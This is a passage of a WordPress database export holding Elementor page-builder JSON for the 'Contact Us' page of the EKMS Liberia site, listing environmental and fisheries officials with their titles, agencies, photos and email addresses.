5f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/Uriah.png\",\"id\":3347}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62420a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Francis W. Mwah<\\/strong><\\/p><p>Director, MOA<\\/p><p><a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9feecd9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John Willabo Johnson <\\/strong><br>\\n\\nAssistant Minister, MME<br>\\n\\n<a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe7894a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Uriah Garsinii <\\/strong><br \\/>Land Use Management Manager, LLA<br \\/><a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9564f30\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/mr-wesseh.png\",\"id\":3367},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b7fd678\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/AlFreeman.jpg\",\"id\":3183},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Aaron S.M. Wesseh<\\/strong><br>\\n\\nManager, CCCD Project<br>\\n\\n<a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director, MOCI<br \\/>Division of Foreign Trade<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer, MOCI<br \\/>National Standard Laboratory<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f37529a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/golafale.png\",\"id\":3351}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards, MOCI<br \\/>Bureau of Industrial Services<br \\/><a href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer, MOCI<br \\/>Division of Knowledge Management &amp; Archive<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a9ecf24\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Ahmed Sheriff <\\/strong><br \\/>Director, NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"738e0dd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6e7b3da\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"e8bed5f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d1d7c9e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/yokie.png\",\"id\":3355}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"918d54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"94412fe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea090e8\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kumeh.png\",\"id\":3360}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"74f915b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e88acc7\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"d32c806\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f40392e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Anthony Yokie<\\/strong><br \\/>Manager, NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"23fe33d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea61b10\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Tonia Boah <\\/strong><br \\/>NaFAA<br \\/>Monitoring, Control, and Surveillance Field Officer <\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"27d77d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d2a5e3d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joyce Kumeh<\\/strong><br \\/>NaFAA<br \\/>Small Scale Fisheries Officer<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1f03dc8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"33e80f1\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"5c25b8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b10d67e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/lavalah.png\",\"id\":3364}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b4a2e51\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"e3dd1e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ad72733\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"707d444\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23520fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a3814ef\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Atty. Stephen B. Lavalah <\\/strong><br \\/>Associate Director, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"18738fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6765846\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Nadine Ajamia<\\/strong><br \\/>Policy Officer, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bd520e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7bc5a8c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry Y. Kesselly<\\/strong><br \\/>Senior Research Officer, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e860d0b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f6d0ce0\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6b97206\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"76384d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c4dcbf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d55206\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8c09b65\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"a0b7d70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"87f3106\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konah Kaliku<\\/strong><br \\/>Environmental Inspector, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea624a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c8f36c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(23363,3394,'_elementor_edit_mode','builder'),(23364,3394,'_elementor_template_type','wp-page'),(23365,3394,'_elementor_version','3.0.16'),(23366,3394,'_wp_page_template','default'),(23367,3394,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\"}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\"}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\"}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/jallah.png\",\"id\":3371},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer\\/UNCBD Focal Point<br \\/>jcammue@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator\\/UNFCCC Focal Point<br \\/>bkarmorh@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator\\/UNCCD Focal Point<br \\/>bjallah@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f9614d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/so.jpg\",\"id\":3324}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/carlon.jpg\",\"id\":3385},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr.<\\/strong>\\n<p>Coordinator Climate Change Secretariat <\\/br>\\nEPA <\\/br>\\n<a href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John K. Jallah<\\/strong>\\n<p>Manager, ESIA <\\/br>\\nDepartment of Compliance and Enforcement <\\/br>\\nEPA\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Daoda S. Carlon <\\/strong><br \\/>Assistant Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a 